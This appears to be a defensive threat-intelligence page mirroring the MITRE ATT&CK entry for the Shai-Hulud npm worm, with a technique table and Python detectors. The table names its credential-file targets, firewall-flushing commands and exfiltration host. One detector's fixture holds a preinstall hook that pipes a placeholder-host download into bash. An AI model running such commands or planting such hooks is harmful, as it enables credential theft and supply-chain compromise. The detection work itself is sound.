S9008: Shai-Hulud
Shai-Hulud is a supply chain worm, first reported in September 2025, that spreads through code repositories, including GitHub and NPM packages. It exploits CI/CD pipeline dependencies to propagate to victims and poisons the supply chain by publishing malicious packages. Once inside a victim environment, Shai-Hulud steals credentials and access tokens from compromised repository accounts and exfiltrates them to attacker-controlled servers via encoded GitHub Actions workflows.[1][2][3][4][5][6][7]
Analyst context for executives and security teams
Shai-Hulud matters because it targets the software supply chain rather than only endpoints. The ATT&CK description identifies it as a worm that spreads through code repositories, GitHub, NPM packages, and CI/CD dependencies, then steals credentials and access tokens and exfiltrates them through encoded GitHub Actions workflows. For executives and security leaders, the practical risk is loss of trust in build pipelines, package dependencies, and repository identities that can affect software delivery, incident scope, and customer assurance.
Executive priority
Prioritize validation of software supply chain controls: repository account security, CI/CD secret handling, package publishing governance, and evidence that build workflows are monitored. This behavior can turn a compromised developer or package dependency into a broader business continuity and compliance problem because stolen tokens may allow follow-on access across repositories, SaaS services, and build infrastructure. Leaders should ask whether the organization can rapidly identify affected packages, revoke exposed tokens, pause unsafe publishing, and prove control effectiveness to auditors or customers.
Technical view
SOC, detection engineering, and IR teams should treat Shai-Hulud as a cross-platform software supply chain threat affecting Linux, Windows, and SaaS environments. Because ATT&CK provides no official detection text or tactic mapping for this object, teams should validate coverage around the behaviors in the description: suspicious repository account activity, unexpected GitHub Actions workflow creation or modification, encoded workflow content, anomalous CI/CD dependency execution, unexpected NPM/package publishing, and outbound connections from build automation to attacker-controlled or unapproved destinations. IR playbooks should include token discovery, revocation, repository review, package integrity checks, and CI/CD workflow containment.
Likely telemetry
- Repository audit logs for account activity, token usage, workflow changes, branch/tag changes, and package publishing events
- CI/CD pipeline logs from GitHub Actions or equivalent workflow systems, including job definitions, environment variables, secrets access, and runner activity
- SaaS identity and access logs for repository accounts, service accounts, access tokens, and unusual authentication patterns
- Package registry logs for NPM or internal package publication, version changes, maintainer changes, and dependency updates
- Endpoint and build runner telemetry from Linux and Windows systems used in development or CI/CD processes
Detection direction
- Validate that repository and CI/CD audit logs are collected with enough detail to reconstruct who changed workflows, published packages, and used tokens.
- Tune detections for unusual GitHub Actions workflow creation, encoded script content, unexpected secrets access, and workflow changes made by accounts that do not normally maintain automation.
- Monitor for package publishing from unusual accounts, locations, runners, or time windows, while accounting for legitimate release automation to reduce false positives.
- Correlate repository events with SaaS identity logs and build runner telemetry; single-source alerts may miss supply chain propagation across accounts, packages, and pipelines.
- Review blind spots around ephemeral CI/CD runners, unmanaged developer tokens, personal access tokens, third-party actions, and dependencies pulled during builds.
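Added example, not part of the ATT&CK record or the analysis above: a small Python detector for the "encoded script content" bullet. It peels nested base64 layers from a log or workflow token and flags decoded JSON that carries secret-like keys, matching the double and triple base64 wrapping of stolen secrets that the technique table attributes to Shai-Hulud. The key-name list and the fixture are constructed for this example; tokens in the fixture are placeholders.

```python
import base64
import binascii
import json
import re
from typing import Optional, Tuple

# Secret-like keys a stolen-secrets JSON dump could carry (assumed list).
SECRET_KEY_HINTS = ("GITHUB_TOKEN", "NPM_TOKEN", "AWS_ACCESS_KEY_ID",
                    "AWS_SECRET_ACCESS_KEY", "GOOGLE_APPLICATION_CREDENTIALS")
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def peel_base64(blob: str, max_layers: int = 5) -> Tuple[int, str]:
    """Strip nested base64 layers; return (layers_removed, inner_text).
    Stops when the text no longer looks like base64 or is not UTF-8,
    so plain log text passes through with layers == 0."""
    text, layers = blob, 0
    while layers < max_layers:
        candidate = text.strip()
        if len(candidate) < 16 or not _B64_RE.match(candidate):
            break
        try:
            text = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        layers += 1
    return layers, text


def find_secret_dump(blob: str) -> Optional[dict]:
    """Flag a token that hides JSON with secret-like keys under one or
    more base64 layers; returns {"layers", "secret_keys"} or None."""
    layers, text = peel_base64(blob)
    if layers == 0:
        return None
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return None
    found = set()

    def walk(node):                           # keys may sit under "env"
        if isinstance(node, dict):
            for key, value in node.items():
                if key.upper() in SECRET_KEY_HINTS:
                    found.add(key)
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(data)
    return {"layers": layers, "secret_keys": sorted(found)} if found else None


def wrap(text: str, layers: int) -> str:
    """Base64-encode `text` `layers` times (fixture helper)."""
    for _ in range(layers):
        text = base64.b64encode(text.encode()).decode()
    return text


# Constructed fixture with placeholder tokens, never real credentials.
FAKE_DUMP = json.dumps({"hostname": "runner-01",
                        "env": {"NPM_TOKEN": "npm_PLACEHOLDER",
                                "GITHUB_TOKEN": "ghp_PLACEHOLDER"}})
```

Run `find_secret_dump` over each whitespace-separated token of collected workflow log lines; a hit with `layers >= 2` is the pattern the page describes, while ordinary single-layer base64 output that decodes to non-JSON text is ignored.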
Mitigation priorities
- Inventory critical repositories, CI/CD workflows, package publishing rights, service accounts, and access tokens before an incident.
- Enforce least privilege and strong governance for repository accounts, package maintainers, CI/CD secrets, and publishing workflows.
- Reduce token exposure by rotating secrets, limiting token scope and lifetime, and preventing unnecessary secrets access in build jobs.
- Require review and approval for workflow changes, package publishing changes, and dependency updates in sensitive projects.
- Use secret scanning, dependency review, and package integrity checks to identify exposed credentials and suspicious package changes.
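Added example, not part of the ATT&CK record or the analysis above, for the "package integrity checks" bullet: a Python check over a parsed package.json and the files of an unpacked package or repository checkout. It flags the `preinstall`/`postinstall` lifecycle hooks, the `.github/workflows/discussion.yaml` workflow, and script content such as curl fetching Bun, PowerShell `Invoke-WebRequest`, TruffleHog, `process["exit"](0x0)` and credential file paths, all of which the technique table on this page attributes to Shai-Hulud. The regexes, the fixture package, the file name `bootstrap.js` and the URL are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Heuristics for behaviours the technique table attributes to Shai-Hulud.
# The regexes are this example's own, not ATT&CK or vendor content.
SCRIPT_PATTERNS: List[Tuple[str, str, str]] = [
    ("T1071.001", r"\bcurl\b.*\bbun\b", "curl used to fetch the Bun runtime"),
    ("T1059.001", r"Invoke-WebRequest", "PowerShell download in an npm script"),
    ("T1105", r"trufflehog", "TruffleHog secrets scanner pulled or run"),
    ("T1553", r"process\[\s*[\"']exit[\"']\s*\]\s*\(\s*0x0\s*\)",
     "forced exit(0) masks install errors"),
    ("T1552.001", r"\.npmrc|\.aws/credentials|azureProfile\.json",
     "credential file paths referenced"),
]
LIFECYCLE_HOOKS = ("preinstall", "postinstall")


def assess_package(manifest: dict, files: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (technique_id, message) findings for an unpacked package.

    `manifest` is the parsed package.json; `files` maps relative paths
    (package tarball or repository checkout) to their text contents."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:                        # T1546.016
        if hook in scripts:
            findings.append(("T1546.016", f"'{hook}' hook runs: {scripts[hook]}"))
    if ".github/workflows/discussion.yaml" in files:    # T1677
        findings.append(("T1677", "discussion.yaml workflow present"))
    for path, text in files.items():
        for technique, pattern, message in SCRIPT_PATTERNS:
            if re.search(pattern, text, re.IGNORECASE):
                findings.append((technique, f"{path}: {message}"))
    return findings


# Constructed fixture: a package whose preinstall hook runs a bootstrap
# script (file name invented for this example) showing two page-described
# behaviours; the URL is a placeholder.
SAMPLE_MANIFEST = {
    "name": "example-lib", "version": "4.1.1",
    "scripts": {"preinstall": "node bootstrap.js", "test": "jest"},
}
SAMPLE_FILES = {
    "bootstrap.js": (
        'const { execSync } = require("child_process");\n'
        'execSync("curl -fsSL https://example.invalid/bun-install | bash");\n'
        'process["exit"](0x0);\n'
    ),
    "index.js": "module.exports = () => 42;\n",
}
CLEAN_MANIFEST = {"name": "tidy-lib", "scripts": {"test": "jest"}}
```

Running this as a gate before publishing or when reviewing a dependency, together with `ignore-scripts=true` in `.npmrc` so lifecycle hooks cannot execute at install time, turns the bullet above into a concrete control.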
Analyst notes and limits
The supplied ATT&CK object describes Shai-Hulud as a supply chain worm involving repositories, GitHub, NPM packages, CI/CD dependencies, credential and token theft, and exfiltration through encoded GitHub Actions workflows. No ATT&CK tactics, aliases, official detection text, external reference details, or relationship mappings were supplied, so this take focuses on defensible validation areas rather than specific ATT&CK technique coverage.
This summary is limited to the supplied STIX fields and description. It does not establish current activity, attribution, prevalence, customer exposure, or guaranteed detection. Local conclusions require environment-specific evidence from repository platforms, CI/CD systems, package registries, identity logs, build runners, and network telemetry.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1027 | Obfuscated Files or Information | Shai-Hulud has utilized double-base64 encoding to store stolen secrets within the GitHub Actions logs of the victim account.[5][6][7][4] Shai-Hulud has also leveraged three layers of base64 encoding of exfiltrated data for anti-forensic purposes.[3] |
| Enterprise | T1548.003 | Sudo and Sudo Caching Sub-technique | Shai-Hulud has attempted to gain root access by leveraging `sudo` and `/etc/sudoers.d`.[3] |
| Enterprise | T1543.002 | Systemd Service Sub-technique | Shai-Hulud has stopped `systemd-resolved` in order to manipulate DNS and firewalls.[3] |
| Enterprise | T1678 | Delay Execution | Shai-Hulud has delayed execution of its larger payloads by forking itself into a background process.[1] |
| Enterprise | T1677 | Poisoned Pipeline Execution | Shai-Hulud has also leveraged GitHub Actions from stolen accounts in order to create a malicious GitHub workflow within `.github/workflows/discussion.yaml`.[5][6][1][3] |
| Enterprise | T1485 | Data Destruction | Shai-Hulud has destroyed the victim's home directory by overwriting and deleting every writable file within the user's home folder.[1][3] Shai-Hulud has also utilized the `shred` command on Linux devices.[2] |
| Enterprise | T1552.001 | Credentials In Files Sub-technique | Shai-Hulud has gathered sensitive data stored in Node.js `process.env`, including credentials and API keys.[5][3][4] Shai-Hulud has harvested credentials stored in config files and credential files in victim environments, including `~/.aws/credentials`, `application_default_credentials.json`, and `azureProfile.json`.[6][1][3][4] Shai-Hulud has also targeted credentials and tokens stored in the NPM file `.npmrc` and in GitHub config files.[6][1][3][4] |
| Enterprise | T1685 | Disable or Modify Tools | Shai-Hulud has replaced DNS configuration from `/tmp/resolved.conf` in order to gain network-level control within CI environments, and has flushed iptables rules using `sudo iptables -F OUTPUT` and `sudo iptables -F DOCKER-USER`.[3] |
| Enterprise | T1195.001 | Compromise Software Dependencies and Development Tools Sub-technique | Shai-Hulud has published itself, within infected packages, under compromised code repository maintainer accounts in attempts to propagate to other victims.[5][6][7][2][3] Shai-Hulud has also modified versions of code packages.[5][6][7][3] |
| Enterprise | T1105 | Ingress Tool Transfer | Shai-Hulud has downloaded packages from code repositories.[5][7][3][4] Shai-Hulud has also downloaded and executed the secrets-discovery tool TruffleHog to gather sensitive data.[6][7][2][3][4] |
| Enterprise | T1059.004 | Unix Shell Sub-technique | Shai-Hulud has utilized Linux shell commands to modify configuration files.[3] |
| Enterprise | T1078.004 | Cloud Accounts Sub-technique | Shai-Hulud has leveraged compromised accounts to log into cloud services to access cloud-hosted repositories.[5][6][1][7][2] |
| Enterprise | T1555.006 | Cloud Secrets Management Stores Sub-technique | Shai-Hulud has gathered secrets from AWS Secrets Manager and GCP Secret Manager.[5][6][3] Shai-Hulud has also gathered data from Azure Key Vault.[6][3] |
| Enterprise | T1564.011 | Ignore Process Interrupts Sub-technique | Shai-Hulud has suppressed NPM warnings by silently exiting with the NPM success code, so that all errors exit with `code 0`.[3] |
| Enterprise | T1119 | Automated Collection | Shai-Hulud has the ability to automatically collect host data, secrets, system information, and endpoints.[5][6][2] |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Shai-Hulud has utilized curl to install Bun over HTTPS.[2] |
| Enterprise | T1593.003 | Code Repositories Sub-technique | Shai-Hulud has the ability to search open sites and code repositories for compromised credentials.[5][2] Shai-Hulud has discovered packages associated with compromised accounts.[6] Shai-Hulud has also searched code repositories for other compromised repositories that include predefined parameters or markers, including "Second Coming" combined with an 18-character alphanumeric string.[6] |
| Enterprise | T1567.001 | Exfiltration to Code Repository Sub-technique | Shai-Hulud has created a repository named `Shai-Hulud` under the compromised account that commits a JSON dump containing system information, environment variables and collected secrets.[5][6][7] Shai-Hulud has also posted stolen credentials to public GitHub repositories.[1][2][3][4] |
| Enterprise | T1036.009 | Break Process Trees Sub-technique | Shai-Hulud has augmented its installation process by having its original install process exit cleanly to give the user the illusion that the package installed normally.[1][3] |
| Enterprise | T1528 | Steal Application Access Token | Shai-Hulud has stolen access tokens and API tokens from within CI/CD pipeline solutions and repositories.[6][1][7][3] |
| Enterprise | T1098 | Account Manipulation | Shai-Hulud has modified GitHub account settings for private repositories and changed them to public.[5][6][7][2] |
| Enterprise | T1553 | Subvert Trust Controls | Shai-Hulud has suppressed victim NPM warnings using `process["exit"](0x0);`, which results in all errors exiting with code 0.[3] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Shai-Hulud has masqueraded as a legitimate Bun installer.[1][3] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Shai-Hulud has used HTTP POST to exfiltrate secrets from the victim environment to an attacker-controlled URL.[5][1][7] |
| Enterprise | T1546.016 | Installer Packages Sub-technique | Shai-Hulud has inserted a new `postinstall` lifecycle hook.[5][1][7][3] Shai-Hulud has also leveraged the NPM lifecycle hook `preinstall`.[6][1][2][3] |
| Enterprise | T1608.001 | Upload Malware Sub-technique | Shai-Hulud has published a malicious gzip-compressed tarball (.tgz) following modification of packages within compromised accounts.[5][4] Shai-Hulud has also modified packages within compromised accounts.[6][7] |
| Enterprise | T1567.004 | Exfiltration Over Webhook Sub-technique | Shai-Hulud has exfiltrated repository secrets to `webhook[.]site`.[7] |
| Enterprise | T1213.003 | Code Repositories Sub-technique | Shai-Hulud has downloaded existing packages from code repositories and extracted data stored within them.[5] |
| Enterprise | T1059.001 | PowerShell Sub-technique | Shai-Hulud has utilized PowerShell `Invoke-WebRequest` to download and install the malicious payload.[2] |
| Enterprise | T1552.005 | Cloud Instance Metadata API Sub-technique | Shai-Hulud has queried the AWS and GCP metadata endpoints for instance and service credentials.[5] |
| Enterprise | T1082 | System Information Discovery | Shai-Hulud has gathered victim system information.[5][3] |
| Enterprise | T1550.001 | Application Access Token Sub-technique | Shai-Hulud has leveraged captured valid NPM tokens to enumerate and update packages on compromised accounts.[5][3][4] Shai-Hulud has also utilized stolen GitHub access tokens to access compromised accounts.[3][4] |
| Enterprise | T1059.007 | JavaScript Sub-technique | Shai-Hulud has used JavaScript to create JSON file output and run scripts using Node.js.[5][6][1][7][2][3][4] |
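Added example, not part of the ATT&CK record or the analysis on this page: a Python correlation routine for the "correlate repository events" direction, built on the behaviours the table above lists for T1567.001 (a repository named `Shai-Hulud`), T1098 (private repositories made public), T1677 (a `discussion.yaml` workflow) and T1195.001 (package publishing). It alerts only when one actor shows two or more distinct indicators inside a time window, so a lone publish from release automation stays quiet. The event schema, field names, actor names and timestamps are constructed and do not mirror any platform's real audit-log format.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed event schema (ts, actor, action, repo, detail); it is this
# example's own and does not mirror any platform's real audit-log format.
SAMPLE_EVENTS = [
    {"ts": "2025-11-24T10:00:00Z", "actor": "maintainer-a", "action": "repo.create",
     "repo": "maintainer-a/Shai-Hulud", "detail": ""},
    {"ts": "2025-11-24T10:00:40Z", "actor": "maintainer-a", "action": "repo.visibility_change",
     "repo": "maintainer-a/internal-tools", "detail": "private->public"},
    {"ts": "2025-11-24T10:02:10Z", "actor": "maintainer-a", "action": "workflow.create",
     "repo": "maintainer-a/internal-tools", "detail": ".github/workflows/discussion.yaml"},
    {"ts": "2025-11-24T10:03:30Z", "actor": "maintainer-a", "action": "package.publish",
     "repo": "maintainer-a/example-lib", "detail": "4.1.1"},
    {"ts": "2025-11-24T11:00:00Z", "actor": "release-bot", "action": "package.publish",
     "repo": "org/example-cli", "detail": "2.0.0"},
    {"ts": "2025-11-24T12:00:00Z", "actor": "dev-b", "action": "repo.visibility_change",
     "repo": "dev-b/dotfiles", "detail": "private->public"},
]


def classify(event: dict) -> Optional[str]:
    """Map one event to an indicator from the technique table, or None."""
    action, detail = event["action"], event.get("detail", "")
    if action == "repo.create" and event["repo"].rsplit("/", 1)[-1] == "Shai-Hulud":
        return "T1567.001 repository named Shai-Hulud created"
    if action == "repo.visibility_change" and detail == "private->public":
        return "T1098 private repository made public"
    if action == "workflow.create" and detail.endswith(".github/workflows/discussion.yaml"):
        return "T1677 discussion.yaml workflow added"
    if action == "package.publish":
        return "T1195.001 package version published"
    return None


def correlate(events: List[dict], window: timedelta = timedelta(minutes=30),
              min_indicators: int = 2) -> Dict[str, List[str]]:
    """Alert on actors showing >= min_indicators distinct indicators inside
    one window. A lone publish or visibility change never alerts, which
    keeps routine release automation and housekeeping quiet."""
    per_actor = defaultdict(list)
    for event in sorted(events, key=lambda e: e["ts"]):
        tag = classify(event)
        if tag:
            stamp = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
            per_actor[event["actor"]].append((stamp, tag))
    alerts: Dict[str, List[str]] = {}
    for actor, hits in per_actor.items():
        for i, (start, _) in enumerate(hits):
            tags = {tag for stamp, tag in hits[i:] if stamp - start <= window}
            if len(tags) >= min_indicators:
                alerts[actor] = sorted(tags)
                break
    return alerts
```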
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources Updates page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 972106ec1370… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Palo Alto Unit 42 Shai-Hulud November 2025. Justin Moore. (2025, November 25). "Shai-Hulud" Worm Compromises npm Ecosystem in Supply Chain Attack (Updated November 26). Retrieved April 9, 2026.
- [2] Microsoft Shai-Hulud December 2025. Microsoft Defender Security Team. (n.d.). Shai-Hulud 2.0: Guidance for detecting, investigating, and defending against the supply chain attack. Retrieved April 9, 2026.
- [3] Socket Shai-Hulud November 2025. Socket Research Team. (2025, November 24). Shai Hulud Strikes Again (v2). Retrieved April 9, 2026.
- [4] Socket Shai-Hulud Trufflehog September 2025. Socket Research Team. (2025, September 15). Popular Tinycolor npm Package Compromised in Supply Chain Attack Affecting 40+ Packages. Retrieved April 9, 2026.
- [5] Aikido Shai-Hulud September 2025. Charlie Eriksen. (2025, September 16). S1ngularity/nx attackers strike again. Retrieved April 9, 2026.
- [6] Netskope Shai-Hulud November 2025. Gianpietro Cutolo. (2025, November 26). Shai-Hulud 2.0: Aggressive, Automated, and Fast Spreading. Retrieved April 9, 2026.
- [7] Wiz Shai-Hulud September 2025. Merav Bar, Rami McCarthy, Barak Sharoni. (2025, September 16). Shai-Hulud: Ongoing Package Supply Chain Worm Delivering Data-Stealing Malware. Retrieved April 9, 2026.
- [8] mitre-attack S9008.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.